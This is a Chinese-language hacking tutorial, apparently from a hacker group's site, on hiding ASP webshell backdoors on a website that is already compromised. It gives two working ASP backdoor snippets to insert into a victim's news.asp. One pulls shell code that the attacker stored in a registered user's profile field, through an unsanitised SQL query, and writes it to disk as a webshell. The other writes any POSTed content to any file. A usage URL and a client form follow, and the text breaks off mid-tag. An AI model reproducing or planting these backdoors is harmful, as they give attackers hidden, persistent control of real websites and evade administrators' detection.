前言：好長時間了，從剛開始的站點管理器到現在流行的幾款asp后門，相信大多網管都能說出這些經典webshell的名字，如海洋、老兵、藍屏等,也相信大多數的網管學會了關鍵字的搜索方法來搜索這些木馬，當然現在的時間如果再象隱藏后門就要講些技巧啦，俗話說的好“佛高一尺，我高一丈”。 
我不否認n早前的那個把asp木馬寫到圖片文件中不失為一種好的方法，其實不僅可以寫到圖片啦寫到mp3文件里寫到doc文件里都是可以的啦。 
copy 文件名/參數 + 文件名/參數 生成文件名 
這樣的方法可以很靈活的運用來達到隱藏文件的目的，具體的參數就是/a以acsic碼方式，/b二進制方式，就不羅嗦這些了，至于如何上傳webshell,什么是webshell也不屬于本文的討論范圍。今天要講的是如何把后門放到后綴.mdb的數據庫中，前提是在我們拿到一個webshell之后…… 
我們所知道的，很多站點在用戶注冊的時候要讓填好多東西例如：用戶名、密碼、QQ、郵箱、個人簡介、電話、聯系方式、住址一類的。而對應到數據庫中也都會有相應的表、字段、值。我今天要做的就是，我注冊一個用戶在我的個人簡介的地方上寫入shell代碼，然后修改他站點上的一個文件，使用的時候觸發這個文件，就把我個人簡歷中的shell代碼，備份到當前目錄下。 
廢話少說了，大家看代碼：
<%
    if request("action")="firefox" then
    fname=request.querystring("fn")
    tname=request.querystring("tn")
    bname=request.querystring("bn")
    id=request.querystring("id")
    idvalue=request.querystring("idv")
    set rs=server.createobject("ADODB.recordset")
    sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
    rs.open sql,conn,1,3
    if not rs.eof then
    content=rs(bname)
    else
    response.write "Nothing"
    end if
    set fso=Server.createObject("Scripting.FileSystemObject")
    set txtfile=fso.createtextfile(server.mappath(fname))
    txtfile.writeline(content)
    txtfile.close
    end if
    %>
將上邊的代碼加到站點的一個文件中，如news.asp。根據我們了解的信息，在其站點注冊后，下載數據庫看結構。我注冊的firefox名字是在 user表，其id值為119 用于存放我注冊簡歷的表字段為jl。
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
那么在使用的時候我們就可以在news.asp相同目錄下寫入一個名為 firefox.asp的webshell。以上可以說是萬千隱藏方法中的一種，下邊再說另外一種更方便的隱藏方法，這個方法就和mdb后綴無關系了。 
同樣我們還是修改news.asp，將以下代碼插入到對方news.asp中：
<%
    if request("action")="firefox" then
    n=request.form("n")
    c=request.form("c")
    set fso=Server.createObject("Scripting.FileSystemObject")
    set txtfile=fso.createtextfile(server.mappath(n))
    txtfile.writeline(c)
    txtfile.close
    end if
    %>
這段代碼相對簡單些，算是一個木馬的服務端吧。使用的時候以這段代碼配合：
<HTML><HEAD>
    <META http-equiv=Content-Type content="text/html; charset=gb2312">
    <title>F.s.t火狐技術聯盟[www.wrsky.com]</title>
    <FORM action="http://localhost/config.asp?action ... method=post>
    <META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
    <BODY>Name:<INPUT size=50
    name=n width="32"><BR><BR>Shell:<TEXTAREA na